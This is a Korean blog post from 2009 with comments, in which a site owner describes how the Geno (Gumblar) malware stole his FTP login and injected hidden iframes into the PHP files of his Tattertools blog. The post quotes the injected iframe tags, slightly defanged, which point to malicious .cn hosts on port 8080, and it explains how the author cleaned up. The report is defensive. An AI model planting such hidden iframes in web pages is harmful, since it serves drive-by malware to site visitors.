'해킹'에 해당되는 글 1건

  1. Jun 24, 2009 제노(Geno) 바이러스 감염 (8)


ggerzer.com 블로그(버전:tattertools-1.1.3-expansion) 먹통

■ 1차 발견 - 2009년 6월 18일 목요일

(1)
태터툴즈관련 plugins 폴더내 거의 모든 플러그인 각각의 index.php 에
<iframe src="에이치티티피클론슬러쉬슬러쉬 globalmixgroup.cn:8080/ts/in.cgi?pepsi64" width=125 height=125 style="visibility: hidden"></iframe> 및
<iframe src="에이치티티피클론슬러쉬슬러쉬 hugebestbuy.cn:8080/index.php" width=126 height=196 style="visibility: hidden"></iframe> 의 내용이 심어져 있었음.

(2)
태터툴즈관련 blog/owner 폴더 위주로 index.php와 main.php에 위와같이 감염.

(3)
그외 홈페이지 계정내 몇몇 폴더의 index.php/htm/html, main.php/htm/html 파일도 감염.


■ 2차 발견 - 2009년 6월 23일 화요일 오후

1차 발견때와 동일한 폴더 및 파일들이 재감염.
단, 도메인이 namegamestore.cn:8080/index.php 와 shopfilmexistence.cn:8080/index.php 로 변경.



현재(2009.06.24)
감염 이전의 파일들로 모두 복구한 상태이나, 언제 또다시 감염될지 모르겠음..




제노 바이러스는 2009년 5월 22일자 뉴스에서부터 검색이 되고 있다. 검색으로 알아본 결과;;
제노(Geno) 바이러스는 일본의 컴퓨터 판매 사이트인 제노라는 업체 홈페이지가 지난 4월 해킹을 당해 이 악성코드가 전파되면서 알려졌으며, 만일 PC 사용자가 이 악성코드에 감염된 숙주 사이트에 접근할 경우, PC에 어도비(Adobe) 아크로뱃(Acrobat)이나 플래시(Flash) 취약점을 통해 PC가 제노 바이러스에 감염됩니다. 이 악성코드에 감염된 PC는 사용자가 FTP 로그인을 하면 계정정보가 유출될 수 있으며 특정 웹사이트로 강제 이동시키는 증상도 나타납니다. 또 일부 백신 소프트웨어 실행이 중지되고 해당 백신 소프트웨어 사이트의 접속이 차단돼 더 큰 피해를 가져올 수 있습니다.

나의 경우, (언제 어디서 어떻게 감염됐는지는 모르겠지만) 제노 악성코드에 감염된 내 PC 에서,
내 홈페이지 계정으로 FTP 로그인을 시도한적이 있기때문에, 나의 FTP 로그인 정보를 빼내어 홈페이지 파일을 강제 수정하여 iframe 자바스크립트 코드를 삽입한 것으로 추정됨..

한동안 FTP 접속할 일이 거의 없었는데,, 공교롭게도 6월18일 romeo1052님의 질문글에 답변하기 위해서 다이어리스킨 소스를 살펴보려고 잠시 FTP 접속했었다는것!!!
그렇다고해서 뭐 속좁게 romeo1052님을 원망한다거나 증오한다거나 그러진 않는다는것을 밝히고 싶다.

Related Entries
Posted by 최우선 at June 24, 2009 13:12

"그외 나머지" 카테고리의 다른 글 입니다.

Trackback URL for this entry ::
http://ggerzer.com/trackback/424

Write a comment

  1. 저랑 아이디가 좀 비슷한 그 romeo1052라는 사람때문에 고생좀 하셨군요
    혼내주시라능

    Posted by romeo1053 at June 24, 2009 21:32 # Edit/Del Reply

    • 이게 다 romeo1052님 탓이다..라고 생각하지 않아요.
      왜냐면, 전 그렇게 속 좁은 사람이 아니거등요..

      Posted by 최우선 at June 25, 2009 15:09 # Edit/Del Reply

  2. 이야... 멋지네요 -_-;;;
    아무튼 원상 복구 되셨으니 다행입니다.


    Posted by donit2 at June 25, 2009 07:35 # Edit/Del Reply

    • 1차 발견 당시에도 감염 이전의 파일들로 모두 복구했음에도 2차 감염이 또다시 발생된거거든요..
      그저께 빛자루 실행해서 싹싹 청소하다보니 뭔가 바이러스가 잡히긴 잡혔는데, 어제 2차 복구후 FTP접속 패스워드를 변경해두긴했는데,,, 3차 감염이 발생할지 안할지는 시간을 갖고 좀 더 지켜봐야할 것 같아요.

      Posted by 최우선 at June 25, 2009 15:14 # Edit/Del Reply

  3. 관리자님 보세요...
    광고성 리플을 삭제하려는데...
    352개가 달렸기에 모두선택하고 삭제하니 하나도 지워지지 않는군요...
    댓글 삭제 갯수 제한이 몇개까지 인지요?
    더 늘려주시면 안될까요?
    하나씩 지우려니 눈아프고, 손가락아프고, 시간아프고....???ㅋ

    Posted by 한바다 at August 23, 2009 18:31 # Edit/Del Reply

    • 댓글 삭제 갯수 제한은 없습니다.
      모두 선택하지 마시고,, 한 서너개만 선택 체크해서 삭제해보세요..
      삭제가 안된다면, 뭔가 스킨설치가 제대로 안된것같습니다..
      스킨의 설정페이지내 게시물관리의 댓글 일괄삭제 메뉴도 있습니다.

      Posted by 최우선 at August 27, 2009 16:15 # Edit/Del Reply

  4. 저도 이거 감염되었는데,,,ㅜㅜ어떻게 잡아야 하나요??
    8080이라는 숫자가 iframe안에 저도 모르는 사이에 들어갔더라구요,,,
    그래서 제 홈페이지 한동안 안되다가 호스팅업체에 전화해서 난리치다가 감염된 파일은 수정했는데,,,,백신이나 이거 잡을수 있는 바이러스 없나요?

    Posted by 저도,,,, at September 21, 2009 13:51 # Edit/Del Reply

    • 일단, 사용하고 계신 컴퓨터에 바이러스가 있는지 체크해서 치료하시고 나서,, 홈페이지 계정의 FTP 접속 비밀번호를 바꾸시는 방법밖에는...

      Posted by 최우선 at September 23, 2009 14:57 # Edit/Del Reply